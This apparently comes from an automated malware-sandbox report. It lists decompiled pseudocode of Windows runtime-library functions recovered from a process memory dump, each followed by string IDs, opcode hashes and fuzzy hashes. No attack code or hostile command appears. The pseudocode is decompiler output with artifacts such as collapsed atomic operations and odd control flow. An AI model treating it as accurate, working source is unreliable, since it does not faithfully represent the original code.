                                                              
                                                              				_t102 = __edi;
                                                              				_t97 = __edx;
                                                              				_v12 = _v12 & 0x00000000;
                                                              				_t55 =  *[fs:0x18];
                                                              				_t109 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t86 = 0;
                                                              				_v32 = _t55;
                                                              				_v24 = 0;
                                                              				_push(__edi);
                                                              				if(__ecx == 0x10d5350) {
                                                              					_t86 = 1;
                                                              					_v24 = 1;
                                                              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                              				}
                                                              				_t103 = _t102 | 0xffffffff;
                                                              				if( *0x10d7bc8 != 0) {
                                                              					_push(0xc000004b);
                                                              					_push(_t103);
                                                              					E010297C0();
                                                              				}
                                                              				if( *0x10d79c4 != 0) {
                                                              					_t57 = 0;
                                                              				} else {
                                                              					_t57 = 0x10d79c8;
                                                              				}
                                                              				_v16 = _t57;
                                                              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                              					_t93 = _t109;
                                                              					L23();
                                                              				}
                                                              				_t58 =  *_t109;
                                                              				if(_t58 == _t103) {
                                                              					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                              					_t58 = _t103;
                                                              					if(__eflags == 0) {
                                                              						_t93 = _t109;
                                                              						E01011624(_t86, __eflags);
                                                              						_t58 =  *_t109;
                                                              					}
                                                              				}
                                                              				_v20 = _v20 & 0x00000000;
                                                              				if(_t58 != _t103) {
                                                              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                              				}
                                                              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                              				_t88 = _v16;
                                                              				_v28 = _t104;
                                                              				L9:
                                                              				while(1) {
                                                              					if(E01007D50() != 0) {
                                                              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                              					} else {
                                                              						_t62 = 0x7ffe0382;
                                                              					}
                                                              					if( *_t62 != 0) {
                                                              						_t63 =  *[fs:0x30];
                                                              						__eflags = _t63[0x240] & 0x00000002;
                                                              						if((_t63[0x240] & 0x00000002) != 0) {
                                                              							_t93 = _t109;
                                                              							E0107FE87(_t93);
                                                              						}
                                                              					}
                                                              					if(_t104 != 0xffffffff) {
                                                              						_push(_t88);
                                                              						_push(0);
                                                              						_push(_t104);
                                                              						_t64 = E01029520();
                                                              						goto L15;
                                                              					} else {
                                                              						while(1) {
                                                              							_t97 =  &_v8;
                                                              							_t64 = E0101E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                              							if(_t64 == 0x102) {
                                                              								break;
                                                              							}
                                                              							_t93 =  *(_t109 + 4);
                                                              							_v8 = _t93;
                                                              							if((_t93 & 0x00000002) != 0) {
                                                              								continue;
                                                              							}
                                                              							L15:
                                                              							if(_t64 == 0x102) {
                                                              								break;
                                                              							}
                                                              							_t89 = _v24;
                                                              							if(_t64 < 0) {
                                                              								L0103DF30(_t93, _t97, _t64);
                                                              								_push(_t93);
                                                              								_t98 = _t97 | 0xffffffff;
                                                              								__eflags =  *0x10d6901;
                                                              								_push(_t109);
                                                              								_v52 = _t98;
                                                              								if( *0x10d6901 != 0) {
                                                              									_push(0);
                                                              									_push(1);
                                                              									_push(0);
                                                              									_push(0x100003);
                                                              									_push( &_v12);
                                                              									_t72 = E01029980();
                                                              									__eflags = _t72;
                                                              									if(_t72 < 0) {
                                                              										_v12 = _t98 | 0xffffffff;
                                                              									}
                                                              								}
                                                              								asm("lock cmpxchg [ecx], edx");
                                                              								_t111 = 0;
                                                              								__eflags = 0;
                                                              								if(0 != 0) {
                                                              									__eflags = _v12 - 0xffffffff;
                                                              									if(_v12 != 0xffffffff) {
                                                              										_push(_v12);
                                                              										E010295D0();
                                                              									}
                                                              								} else {
                                                              									_t111 = _v12;
                                                              								}
                                                              								return _t111;
                                                              							} else {
                                                              								if(_t89 != 0) {
                                                              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                              									_t77 = E01007D50();
                                                              									__eflags = _t77;
                                                              									if(_t77 == 0) {
                                                              										_t64 = 0x7ffe0384;
                                                              									} else {
                                                              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              									}
                                                              									__eflags =  *_t64;
                                                              									if( *_t64 != 0) {
                                                              										_t64 =  *[fs:0x30];
                                                              										__eflags = _t64[0x240] & 0x00000004;
                                                              										if((_t64[0x240] & 0x00000004) != 0) {
                                                              											_t78 = E01007D50();
                                                              											__eflags = _t78;
                                                              											if(_t78 == 0) {
                                                              												_t64 = 0x7ffe0385;
                                                              											} else {
                                                              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              											}
                                                              											__eflags =  *_t64 & 0x00000020;
                                                              											if(( *_t64 & 0x00000020) != 0) {
                                                              												_t64 = E01067016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              								return _t64;
                                                              							}
                                                              						}
                                                              						_t97 = _t88;
                                                              						_t93 = _t109;
                                                              						E0107FDDA(_t97, _v12);
                                                              						_t105 =  *_t109;
                                                              						_t67 = _v12 + 1;
                                                              						_v12 = _t67;
                                                              						__eflags = _t105 - 0xffffffff;
                                                              						if(_t105 == 0xffffffff) {
                                                              							_t106 = 0;
                                                              							__eflags = 0;
                                                              						} else {
                                                              							_t106 =  *(_t105 + 0x14);
                                                              						}
                                                              						__eflags = _t67 - 2;
                                                              						if(_t67 > 2) {
                                                              							__eflags = _t109 - 0x10d5350;
                                                              							if(_t109 != 0x10d5350) {
                                                              								__eflags = _t106 - _v20;
                                                              								if(__eflags == 0) {
                                                              									_t93 = _t109;
                                                              									E0107FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                              								}
                                                              							}
                                                              						}
                                                              						_push("RTL: Re-Waiting\n");
                                                              						_push(0);
                                                              						_push(0x65);
                                                              						_v20 = _t106;
                                                              						E01075720();
                                                              						_t104 = _v28;
                                                              						_t116 = _t116 + 0xc;
                                                              						continue;
                                                              					}
                                                              				}
                                                              			}


                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Re-Waiting
                                                              • API String ID: 0-316354757
                                                              • Opcode ID: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
                                                              • Instruction ID: 33a3bcffa4be35dd66d0adbbbb7ecde21907ecf3c5952ac853c4377697afbf16
                                                              • Opcode Fuzzy Hash: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
                                                              • Instruction Fuzzy Hash: 87615671E00A969FDB72DB69C840BBE77ECEB84324F1402A6D991972C1D7349D019782
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E010B0EA5(void* __ecx, void* __edx) {
                                                              				signed int _v20;
                                                              				char _v24;
                                                              				intOrPtr _v28;
                                                              				unsigned int _v32;
                                                              				signed int _v36;
                                                              				intOrPtr _v40;
                                                              				char _v44;
                                                              				intOrPtr _v64;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed int _t58;
                                                              				unsigned int _t60;
                                                              				intOrPtr _t62;
                                                              				char* _t67;
                                                              				char* _t69;
                                                              				void* _t80;
                                                              				void* _t83;
                                                              				intOrPtr _t93;
                                                              				intOrPtr _t115;
                                                              				char _t117;
                                                              				void* _t120;
                                                              
                                                              				_t83 = __edx;
                                                              				_t117 = 0;
                                                              				_t120 = __ecx;
                                                              				_v44 = 0;
                                                              				if(E010AFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                              					L24:
                                                              					_t109 = _v44;
                                                              					if(_v44 != 0) {
                                                              						E010B1074(_t83, _t120, _t109, _t117, _t117);
                                                              					}
                                                              					L26:
                                                              					return _t117;
                                                              				}
                                                              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                              				_t5 = _t83 + 1; // 0x1
                                                              				_v36 = _t5 << 0xc;
                                                              				_v40 = _t93;
                                                              				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                              				asm("sbb ebx, ebx");
                                                              				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                              				if(_t58 != 0) {
                                                              					_push(0);
                                                              					_push(0x14);
                                                              					_push( &_v24);
                                                              					_push(3);
                                                              					_push(_t93);
                                                              					_push(0xffffffff);
                                                              					_t80 = E01029730();
                                                              					_t115 = _v64;
                                                              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                              						_push(_t93);
                                                              						E010AA80D(_t115, 1, _v20, _t117);
                                                              						_t83 = 4;
                                                              					}
                                                              				}
                                                              				if(E010AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                              					goto L24;
                                                              				}
                                                              				_t60 = _v32;
                                                              				_t97 = (_t60 != 0x100000) + 1;
                                                              				_t83 = (_v44 -  *0x10d8b04 >> 0x14) + (_v44 -  *0x10d8b04 >> 0x14);
                                                              				_v28 = (_t60 != 0x100000) + 1;
                                                              				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                              				_v40 = _t62;
                                                              				if(_t83 >= _t62) {
                                                              					L10:
                                                              					asm("lock xadd [eax], ecx");
                                                              					asm("lock xadd [eax], ecx");
                                                              					if(E01007D50() == 0) {
                                                              						_t67 = 0x7ffe0380;
                                                              					} else {
                                                              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              					}
                                                              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                              						E010A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                              					}
                                                              					if(E01007D50() == 0) {
                                                              						_t69 = 0x7ffe0388;
                                                              					} else {
                                                              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              					}
                                                              					if( *_t69 != 0) {
                                                              						E0109FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                              					}
                                                              					if(( *0x10d8724 & 0x00000008) != 0) {
                                                              						E010A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                              					}
                                                              					_t117 = _v44;
                                                              					goto L26;
                                                              				}
                                                              				while(E010B15B5(0x10d8ae4, _t83, _t97, _t97) >= 0) {
                                                              					_t97 = _v28;
                                                              					_t83 = _t83 + 2;
                                                              					if(_t83 < _v40) {
                                                              						continue;
                                                              					}
                                                              					goto L10;
                                                              				}
                                                              				goto L24;
                                                              			}


                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `
                                                              • API String ID: 0-2679148245
                                                              • Opcode ID: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
                                                              • Instruction ID: af6782fd764b6ebd0c37c1b4aad757565a746bdfba7fd8dbad8f360d486e4db5
                                                              • Opcode Fuzzy Hash: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
                                                              • Instruction Fuzzy Hash: B5519A713043829BE325DF28E8D4B9BBBE5EB84704F04096DFAC687690D771E805CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 75%
                                                              			E0101F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				char* _v20;
                                                              				intOrPtr _v24;
                                                              				char _v28;
                                                              				intOrPtr _v32;
                                                              				char _v36;
                                                              				char _v44;
                                                              				char _v52;
                                                              				intOrPtr _v56;
                                                              				char _v60;
                                                              				intOrPtr _v72;
                                                              				void* _t51;
                                                              				void* _t58;
                                                              				signed short _t82;
                                                              				short _t84;
                                                              				signed int _t91;
                                                              				signed int _t100;
                                                              				signed short* _t103;
                                                              				void* _t108;
                                                              				intOrPtr* _t109;
                                                              
                                                              				_t103 = __ecx;
                                                              				_t82 = __edx;
                                                              				_t51 = E01004120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                              				if(_t51 >= 0) {
                                                              					_push(0x21);
                                                              					_push(3);
                                                              					_v56 =  *0x7ffe02dc;
                                                              					_v20 =  &_v52;
                                                              					_push( &_v44);
                                                              					_v28 = 0x18;
                                                              					_push( &_v28);
                                                              					_push(0x100020);
                                                              					_v24 = 0;
                                                              					_push( &_v60);
                                                              					_v16 = 0x40;
                                                              					_v12 = 0;
                                                              					_v8 = 0;
                                                              					_t58 = E01029830();
                                                              					_t87 =  *[fs:0x30];
                                                              					_t108 = _t58;
                                                              					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                              					if(_t108 < 0) {
                                                              						L11:
                                                              						_t51 = _t108;
                                                              					} else {
                                                              						_push(4);
                                                              						_push(8);
                                                              						_push( &_v36);
                                                              						_push( &_v44);
                                                              						_push(_v60);
                                                              						_t108 = E01029990();
                                                              						if(_t108 < 0) {
                                                              							L10:
                                                              							_push(_v60);
                                                              							E010295D0();
                                                              							goto L11;
                                                              						} else {
                                                              							_t109 = L01004620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                              							if(_t109 == 0) {
                                                              								_t108 = 0xc0000017;
                                                              								goto L10;
                                                              							} else {
                                                              								_t21 = _t109 + 0x18; // 0x18
                                                              								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                              								 *_t109 = 1;
                                                              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                              								 *(_t109 + 0xe) = _t82;
                                                              								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                              								E0102F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                              								_t91 =  *_t103 & 0x0000ffff;
                                                              								_t100 = _t91 & 0xfffffffe;
                                                              								_t84 = 0x5c;
                                                              								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                              										_push(_v60);
                                                              										E010295D0();
                                                              										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                              										_t51 = 0xc0000106;
                                                              									} else {
                                                              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                              										goto L5;
                                                              									}
                                                              								} else {
                                                              									L5:
                                                              									 *_a4 = _t109;
                                                              									_t51 = 0;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t51;
                                                              			}


























                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                              • Instruction ID: 8fdc252dfe0d6c5d905de37420e6de76e9be9535c9558e5b9a07d9786e5ff2c5
                                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                              • Instruction Fuzzy Hash: 85518F716047119FD321DF29C840AABBBF9FF48750F00892DFA9597690E7B4E914CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 75%
                                                              			E01063540(intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				intOrPtr _v88;
                                                              				intOrPtr _v92;
                                                              				char _v96;
                                                              				char _v352;
                                                              				char _v1072;
                                                              				intOrPtr _v1140;
                                                              				intOrPtr _v1148;
                                                              				char _v1152;
                                                              				char _v1156;
                                                              				char _v1160;
                                                              				char _v1164;
                                                              				char _v1168;
                                                              				char* _v1172;
                                                              				short _v1174;
                                                              				char _v1176;
                                                              				char _v1180;
                                                              				char _v1192;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				short _t41;
                                                              				short _t42;
                                                              				intOrPtr _t80;
                                                              				intOrPtr _t81;
                                                              				signed int _t82;
                                                              				void* _t83;
                                                              
                                                              				_v12 =  *0x10dd360 ^ _t82;
                                                              				_t41 = 0x14;
                                                              				_v1176 = _t41;
                                                              				_t42 = 0x16;
                                                              				_v1174 = _t42;
                                                              				_v1164 = 0x100;
                                                              				_v1172 = L"BinaryHash";
                                                              				_t81 = E01020BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                              				if(_t81 < 0) {
                                                              					L11:
                                                              					_t75 = _t81;
                                                              					E01063706(0, _t81, _t79, _t80);
                                                              					L12:
                                                              					if(_a4 != 0xc000047f) {
                                                              						E0102FA60( &_v1152, 0, 0x50);
                                                              						_v1152 = 0x60c201e;
                                                              						_v1148 = 1;
                                                              						_v1140 = E01063540;
                                                              						E0102FA60( &_v1072, 0, 0x2cc);
                                                              						_push( &_v1072);
                                                              						E0103DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                              						E01070C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                              						_push(_v1152);
                                                              						_push(0xffffffff);
                                                              						E010297C0();
                                                              					}
                                                              					return E0102B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                              				}
                                                              				_t79 =  &_v352;
                                                              				_t81 = E01063971(0, _a4,  &_v352,  &_v1156);
                                                              				if(_t81 < 0) {
                                                              					goto L11;
                                                              				}
                                                              				_t75 = _v1156;
                                                              				_t79 =  &_v1160;
                                                              				_t81 = E01063884(_v1156,  &_v1160,  &_v1168);
                                                              				if(_t81 >= 0) {
                                                              					_t80 = _v1160;
                                                              					E0102FA60( &_v96, 0, 0x50);
                                                              					_t83 = _t83 + 0xc;
                                                              					_push( &_v1180);
                                                              					_push(0x50);
                                                              					_push( &_v96);
                                                              					_push(2);
                                                              					_push( &_v1176);
                                                              					_push(_v1156);
                                                              					_t81 = E01029650();
                                                              					if(_t81 >= 0) {
                                                              						if(_v92 != 3 || _v88 == 0) {
                                                              							_t81 = 0xc000090b;
                                                              						}
                                                              						if(_t81 >= 0) {
                                                              							_t75 = _a4;
                                                              							_t79 =  &_v352;
                                                              							E01063787(_a4,  &_v352, _t80);
                                                              						}
                                                              					}
                                                              					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                              				}
                                                              				_push(_v1156);
                                                              				E010295D0();
                                                              				if(_t81 >= 0) {
                                                              					goto L12;
                                                              				} else {
                                                              					goto L11;
                                                              				}
                                                              			}
































                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
                                                              • Instruction ID: 89d7be19221ae4357cf1ace0147799c841b77539bd02bb48f30a7a9ee2c44224
                                                              • Opcode Fuzzy Hash: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
                                                              • Instruction Fuzzy Hash: CD4142F1D0052DABDB21DA50CC85FEEB77CAB54714F0085A5EA49AB241DB319E888FE4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 71%
                                                              			E010B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                              				signed int _v20;
                                                              				char _v24;
                                                              				signed int _v28;
                                                              				char _v32;
                                                              				signed int _v36;
                                                              				intOrPtr _v40;
                                                              				void* __ebx;
                                                              				void* _t35;
                                                              				signed int _t42;
                                                              				char* _t48;
                                                              				signed int _t59;
                                                              				signed char _t61;
                                                              				signed int* _t79;
                                                              				void* _t88;
                                                              
                                                              				_v28 = __edx;
                                                              				_t79 = __ecx;
                                                              				if(E010B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                              					L13:
                                                              					_t35 = 0;
                                                              					L14:
                                                              					return _t35;
                                                              				}
                                                              				_t61 = __ecx[1];
                                                              				_t59 = __ecx[0xf];
                                                              				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                              				_v36 = _a8 << 0xc;
                                                              				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                              				asm("sbb esi, esi");
                                                              				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                              				if(_t42 != 0) {
                                                              					_push(0);
                                                              					_push(0x14);
                                                              					_push( &_v24);
                                                              					_push(3);
                                                              					_push(_t59);
                                                              					_push(0xffffffff);
                                                              					if(E01029730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                              						_push(_t61);
                                                              						E010AA80D(_t59, 1, _v20, 0);
                                                              						_t88 = 4;
                                                              					}
                                                              				}
                                                              				_t35 = E010AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                              				if(_t35 < 0) {
                                                              					goto L14;
                                                              				}
                                                              				E010B1293(_t79, _v40, E010B07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                              				if(E01007D50() == 0) {
                                                              					_t48 = 0x7ffe0380;
                                                              				} else {
                                                              					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              				}
                                                              				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                              					E010A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                              				}
                                                              				goto L13;
                                                              			}


















                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `
                                                              • API String ID: 0-2679148245
                                                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                              • Instruction ID: 8f8828e649ad0adde63528c3903b2256daef612217638f83c7c50d1dcaf3490c
                                                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                              • Instruction Fuzzy Hash: C431E232700306ABE710DE28CC85FDB7BE9AB88754F144229FA949B284D770E904C791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E01063884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr* _v16;
                                                              				char* _v20;
                                                              				short _v22;
                                                              				char _v24;
                                                              				intOrPtr _t38;
                                                              				short _t40;
                                                              				short _t41;
                                                              				void* _t44;
                                                              				intOrPtr _t47;
                                                              				void* _t48;
                                                              
                                                              				_v16 = __edx;
                                                              				_t40 = 0x14;
                                                              				_v24 = _t40;
                                                              				_t41 = 0x16;
                                                              				_v22 = _t41;
                                                              				_t38 = 0;
                                                              				_v12 = __ecx;
                                                              				_push( &_v8);
                                                              				_push(0);
                                                              				_push(0);
                                                              				_push(2);
                                                              				_t43 =  &_v24;
                                                              				_v20 = L"BinaryName";
                                                              				_push( &_v24);
                                                              				_push(__ecx);
                                                              				_t47 = 0;
                                                              				_t48 = E01029650();
                                                              				if(_t48 >= 0) {
                                                              					_t48 = 0xc000090b;
                                                              				}
                                                              				if(_t48 != 0xc0000023) {
                                                              					_t44 = 0;
                                                              					L13:
                                                              					if(_t48 < 0) {
                                                              						L16:
                                                              						if(_t47 != 0) {
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                              						}
                                                              						L18:
                                                              						return _t48;
                                                              					}
                                                              					 *_v16 = _t38;
                                                              					 *_a4 = _t47;
                                                              					goto L18;
                                                              				}
                                                              				_t47 = L01004620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                              				if(_t47 != 0) {
                                                              					_push( &_v8);
                                                              					_push(_v8);
                                                              					_push(_t47);
                                                              					_push(2);
                                                              					_push( &_v24);
                                                              					_push(_v12);
                                                              					_t48 = E01029650();
                                                              					if(_t48 < 0) {
                                                              						_t44 = 0;
                                                              						goto L16;
                                                              					}
                                                              					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                              						_t48 = 0xc000090b;
                                                              					}
                                                              					_t44 = 0;
                                                              					if(_t48 < 0) {
                                                              						goto L16;
                                                              					} else {
                                                              						_t17 = _t47 + 0xc; // 0xc
                                                              						_t38 = _t17;
                                                              						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                              							_t48 = 0xc000090b;
                                                              						}
                                                              						goto L13;
                                                              					}
                                                              				}
                                                              				_t48 = _t48 + 0xfffffff4;
                                                              				goto L18;
                                                              			}
















                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
                                                              • Instruction ID: abc62330088f1cb655fa51e9ca1aee9a0d5264c94ab0b686c16cdd741b950524
                                                              • Opcode Fuzzy Hash: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
                                                              • Instruction Fuzzy Hash: BF31E832D0051AAFEB16DA58C945EAFB7B8FB44720F014169E998AB251D7319E00CBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 33%
                                                              			E0101D294(void* __ecx, char __edx, void* __eflags) {
                                                              				signed int _v8;
                                                              				char _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				intOrPtr _v64;
                                                              				char* _v68;
                                                              				intOrPtr _v72;
                                                              				char _v76;
                                                              				signed int _v84;
                                                              				intOrPtr _v88;
                                                              				char _v92;
                                                              				intOrPtr _v96;
                                                              				intOrPtr _v100;
                                                              				char _v104;
                                                              				char _v105;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t35;
                                                              				char _t38;
                                                              				signed int _t40;
                                                              				signed int _t44;
                                                              				signed int _t52;
                                                              				void* _t53;
                                                              				void* _t55;
                                                              				void* _t61;
                                                              				intOrPtr _t62;
                                                              				void* _t64;
                                                              				signed int _t65;
                                                              				signed int _t66;
                                                              
                                                              				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                              				_v8 =  *0x10dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                              				_v105 = __edx;
                                                              				_push( &_v92);
                                                              				_t52 = 0;
                                                              				_push(0);
                                                              				_push(0);
                                                              				_push( &_v104);
                                                              				_push(0);
                                                              				_t59 = __ecx;
                                                              				_t55 = 2;
                                                              				if(E01004120(_t55, __ecx) < 0) {
                                                              					_t35 = 0;
                                                              					L8:
                                                              					_pop(_t61);
                                                              					_pop(_t64);
                                                              					_pop(_t53);
                                                              					return E0102B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                              				}
                                                              				_v96 = _v100;
                                                              				_t38 = _v92;
                                                              				if(_t38 != 0) {
                                                              					_v104 = _t38;
                                                              					_v100 = _v88;
                                                              					_t40 = _v84;
                                                              				} else {
                                                              					_t40 = 0;
                                                              				}
                                                              				_v72 = _t40;
                                                              				_v68 =  &_v104;
                                                              				_push( &_v52);
                                                              				_v76 = 0x18;
                                                              				_push( &_v76);
                                                              				_v64 = 0x40;
                                                              				_v60 = _t52;
                                                              				_v56 = _t52;
                                                              				_t44 = E010298D0();
                                                              				_t62 = _v88;
                                                              				_t65 = _t44;
                                                              				if(_t62 != 0) {
                                                              					asm("lock xadd [edi], eax");
                                                              					if((_t44 | 0xffffffff) != 0) {
                                                              						goto L4;
                                                              					}
                                                              					_push( *((intOrPtr*)(_t62 + 4)));
                                                              					E010295D0();
                                                              					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                              					goto L4;
                                                              				} else {
                                                              					L4:
                                                              					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                              					if(_t65 >= 0) {
                                                              						_t52 = 1;
                                                              					} else {
                                                              						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                              							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                              						}
                                                              					}
                                                              					_t35 = _t52;
                                                              					goto L8;
                                                              				}
                                                              			}


































                                                              Strings
                                                              Memory Dump Source
